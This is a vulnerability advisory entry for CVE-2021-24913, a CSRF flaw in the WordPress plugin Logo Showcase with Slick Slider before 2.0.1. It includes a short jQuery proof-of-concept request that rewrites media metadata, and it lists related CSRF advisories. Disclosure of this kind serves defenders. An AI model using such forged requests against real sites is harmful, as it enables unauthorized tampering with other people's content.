Logo Showcase with Slick Slider < 2.0.1 – Arbitrary Media Title/Description/Alt Text/URL Update via CSRF | CVE 2021-24913 | Plugin Vulnerabilities

Description

The plugin does not have CSRF check in the lswss_save_attachment_data AJAX action, allowing attackers to make a logged in high privilege user, change title, description, alt text, and URL of arbitrary uploaded media.

Proof of Concept

jQuery.post(ajaxurl,{
action: "lswss_save_attachment_data",
attachment_id: 564,
form_data: "lswss_attachment_title=Test&lswss_attachment_desc=Changed%20via%20CSRF&lswss_attachment_alt=Alt%20text&lswss_attachment_link="
})

Affects Plugins

logo-showcase-with-slick-slider

Fixed in 2.0.1

References

CVE

URL

https://plugins.trac.wordpress.org/changeset/2669404

Classification

Type

CSRF

OWASP top 10

A2: Broken Authentication and Session Management

CWE

CVSS

Miscellaneous

Original Researcher

apple502j

Submitter

apple502j

Verified

Yes

WPVDB ID

2f499945-1924-49f0-ad6e-9192273a5c05

Timeline

Publicly Published

2022-01-31 (about 3 years ago)

Added

2022-01-31 (about 3 years ago)

Last Updated

2022-04-13 (about 3 years ago)

Other

Published

Title

Published

2022-08-01

Title

WP Edit Menu <= 1.5.0 - Arbitrary Post Deletion via CSRF

Published

2022-05-18

Title

Latest Tweets Widget <= 1.1.4 - Arbitrary Settings Update via CSRF

Published

2023-12-04

Title

SureTriggers < 1.0.24 - Cross-Site Request Forgery

Published

2021-06-30

Title

Woocommerce Tabs Plugin, Add Custom Product Tabs <= 1.0.1 - Arbitrary Tab Deletion/Edition via CSRF

Published

2025-01-16

Title

Free MailClient FMC <= 1.0 - Cross-Site Request Forgery to Stored Cross-Site Scripting